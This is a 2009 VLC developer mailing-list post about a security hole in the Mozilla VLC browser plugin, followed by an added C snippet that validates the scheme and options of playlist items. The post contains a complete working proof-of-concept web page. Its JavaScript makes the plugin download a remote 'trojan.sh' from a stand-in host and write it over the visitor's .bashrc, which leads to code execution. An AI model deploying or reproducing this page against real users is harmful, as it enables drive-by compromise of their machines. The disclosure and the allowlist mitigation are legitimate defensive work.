[vlc-devel] Regarding the seemingly still "obscure" security problem
Rémi Denis-Courmont
rdenis at simphalempin.com
Sat Jan 17 14:26:25 CET 2009
Good news everyone!
As pointed out over a year ago, I am not reckless enough to build, or worse,
use the Mozilla VLC plugin:
http://mailman.videolan.org/pipermail/vlc-devel/2007-December/037720.html
However, a recent post on the VideoLAN forums made me try it again:
http://forum.videolan.org/viewtopic.php?f=2&t=54752#p180590
For obvious reasons, I don't bother to build the Mozilla VLC
trojan^Wplugin from my bugfix and development trees, so I am unable to test
version 0.8.6h from the Debian Lenny package. As far as I can tell, this
still works as well as it did a year ago:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<title>VLC browser plugin file overwrite page</title>
</head>
<body>
<embed type="application/x-vlc-plugin"
pluginspage="http://www.videolan.org"
version="VideoLAN.VLCPlugin.2"
width="640"
height="480"
id="vlc">
</embed>
<script type="text/javascript"><!--
var vlc = document.getElementById("vlc");
var src = "http/dump://www.example.com/trojan.sh";
var dst = ".bashrc";
vlc.playlist.add (src, "File", ":demuxdump-file=" + dst);
vlc.playlist.play ();
//!--></script>
</body>
</html>
I guess OSX users should be happy that it does not work on their platform
anymore. If it were up to me, the browser crap^Wplugins would not be in the
main tree.
--
Rémi Denis-Courmont
http://www.remlab.net/
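
A plugin-side mitigation for the behaviour shown in the message above, as an added example that is not part of the original post and is not VLC's own code: before queuing an item requested by page script, accept only a plain allowlisted scheme and allowlisted per-item options. The function names and both allowlists are hypothetical and chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Illustrative allowlists (assumptions, not VLC's own lists). */
static const char *const SAFE_SCHEMES[] = { "http", "https", "rtsp" };
static const char *const SAFE_OPTIONS[] = { "start-time", "stop-time",
                                            "input-repeat" };

static int in_list(const char *s, size_t len,
                   const char *const *list, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (strlen(list[i]) == len && memcmp(list[i], s, len) == 0)
            return 1;
    return 0;
}

/* The text before "://" must be exactly one allowed scheme. A value such as
 * "http/dump" (access plus a forced demux) is not in the list, so it fails. */
int mrl_allowed(const char *mrl)
{
    const char *sep = mrl ? strstr(mrl, "://") : NULL;
    if (sep == NULL)
        return 0;
    return in_list(mrl, (size_t)(sep - mrl), SAFE_SCHEMES,
                   sizeof SAFE_SCHEMES / sizeof *SAFE_SCHEMES);
}

/* An option is ":name" or ":name=value"; only the name is matched, so
 * unknown names such as "demuxdump-file" are refused (fail closed). */
int option_allowed(const char *opt)
{
    if (opt == NULL || opt[0] != ':')
        return 0;
    opt++;
    return in_list(opt, strcspn(opt, "="), SAFE_OPTIONS,
                   sizeof SAFE_OPTIONS / sizeof *SAFE_OPTIONS);
}

/* Returns 1 only if the MRL and every option pass; on 0 the caller
 * should refuse to add the item to the playlist. */
int untrusted_add_allowed(const char *mrl, const char *const *opts, size_t n)
{
    if (!mrl_allowed(mrl))
        return 0;
    for (size_t i = 0; i < n; i++)
        if (!option_allowed(opts[i]))
            return 0;
    return 1;
}
```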